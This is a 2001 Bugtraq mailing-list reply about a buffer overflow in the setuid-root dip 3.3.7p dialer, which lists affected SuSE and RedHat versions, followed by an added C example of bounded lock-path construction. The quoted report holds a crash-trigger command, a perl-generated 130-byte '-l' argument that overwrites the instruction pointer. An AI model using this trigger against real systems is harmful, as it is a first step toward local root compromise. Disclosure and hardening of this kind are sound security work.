[21564] in bugtraq
Re: dip 3.3.7p-overflow
daemon@ATHENA.MIT.EDU (Martijn A.)
Tue Jul 17 11:57:44 2001
From: "Martijn A." <ntr0nic@hotmail.com>
To: mmmad@siodemka.p.lodz.pl
Cc: bugtraq@securityfocus.com
Date: Tue, 17 Jul 2001 15:44:25 +0200
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F47zQUq9ZoQ21Y1B0y60001e188@hotmail.com>
>After doing a check on my SuSE Linux 7.0 x86 I found something
>interesting:
>
>hegi@faust:~ > ls -la /usr/sbin/dip
>-rwsr-xr-- 1 root dialout 62056 Jul 29 2000 /usr/sbin/dip
>
>DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
>Written by Fred N. van Kempen, MicroWalt Corporation.
>
>(gdb) run -k -l `perl -e 'print "a" x 130 '`
>Starting program: /usr/sbin/dip -k -l `perl -e 'print "a" x 130 '`
>DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
>Written by Fred N. van Kempen, MicroWalt Corporation.
>
>DIP: cannot open /var/lock/LCK..aaaa......aaaaaaa: Datei oder Verzeichnis nicht gefunden
>
>Program received signal SIGSEGV, Segmentation fault.
>0x61616161 in ?? ()
>
>The same packet and problem is on SuSE 7.1 and RedHat 6.2. I don't have
>SuSE 7.2 to check.

SuSE 6.2 and 6.3 are also vulnerable and setuid root. But normal users, just
like on SuSE 7.0, don't have execute permissions on these versions.

Regards,
Martijn A.
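
Added example, not part of the original post and not dip's own code: a bounded way for a setuid program to build the lock-file path from the `-l` argument, so that an over-long name like the 130-byte one in the quoted report is rejected instead of written past the buffer. The prefix `/var/lock/LCK..` comes from the error message quoted above; the function name `build_lock_path`, the 64-byte buffer size and the rejection of `/` in the name are assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define LOCK_PREFIX   "/var/lock/LCK.."  /* prefix seen in the quoted dip error */
#define LOCK_PATH_MAX 64                 /* assumed size, not taken from dip */

/* Build the lock path for a caller-supplied line name.
 * Returns 0 on success; -1 with errno set if the name is rejected.
 * On failure dst is left as an empty string, never a truncated path. */
int build_lock_path(char *dst, size_t dstlen, const char *line)
{
    int written;

    if (dst == NULL || dstlen == 0 || line == NULL) {
        errno = EINVAL;
        return -1;
    }
    dst[0] = '\0';

    /* Empty names and names with a path separator are refused: a setuid
     * program must not let the caller steer the file out of /var/lock. */
    if (line[0] == '\0' || strchr(line, '/') != NULL) {
        errno = EINVAL;
        return -1;
    }

    /* snprintf never writes more than dstlen bytes; its return value is
     * the length the full string needs, so >= dstlen means "did not fit". */
    written = snprintf(dst, dstlen, "%s%s", LOCK_PREFIX, line);
    if (written < 0 || (size_t)written >= dstlen) {
        dst[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    char path[LOCK_PATH_MAX];
    const char *line = argc > 1 ? argv[1] : "ttyS0";  /* constructed default */

    if (build_lock_path(path, sizeof path, line) != 0) {
        perror("lock name rejected");
        return 1;
    }
    printf("lock file: %s\n", path);
    return 0;
}
```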